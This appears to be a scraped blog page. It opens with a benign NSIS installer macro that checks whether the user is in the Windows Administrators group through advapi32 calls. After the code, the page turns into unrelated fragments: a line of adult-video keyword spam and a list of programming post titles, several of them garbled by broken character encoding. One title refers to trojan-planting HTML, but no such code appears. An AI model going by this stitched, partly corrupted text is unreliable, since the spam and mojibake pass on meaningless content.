!macro IsUserAdmin RESULT
!define Index "Line${__LINE__}"
   StrCpy ${RESULT} 0
   System::Call '*(&i1 0,&i4 0,&i1 5)i.r0'
   System::Call 'advapi32::AllocateAndInitializeSid(i r0,i 2,i 32,i 544,i 0,i 0,i 0,i 0,i 0, \
   i 0,*i .R0)i.r5'
   System::Free $0
   System::Call 'advapi32::CheckTokenMembership(i n,i R0,*i .R1)i.r5'
   StrCmp $5 0 ${Index}_Error
   StrCpy ${RESULT} $R1
   Goto ${Index}_End
${Index}_Error:
   StrCpy ${RESULT} -1
${Index}_End:
   System::Call 'advapi32::FreeSid(i R0)i.r5'
!undef Index
!macroend

brent 2005-07-25 09:11 发表评论

午夜欧美视频,欧美在线视频免费播放,一区二区在线免费观看

printer driver

simulate OnIdle in MFC ActiveX control

vista windows 7 areo progress bar

恨不盔R��未嫁时

create mfc dialog by template will drive you mad.

trap in CreateCompatibleBitmap and memory dc

ie helper, great!

digitizers

disk id and WMI C#

note Algorithm book, sql server download, .net context help, activex hotkey/ accelerator

Excel addin处理学生成�W

一�D�|��入木马的html代码

2.条�g

3.步骤

4.问题

5.注意

6.相关链接

Activex和ie ���览器的互动

VC�E�序使用chm帮助文�g

�~�写DOS批处理文件[转]

Activex和ie ��览器的互动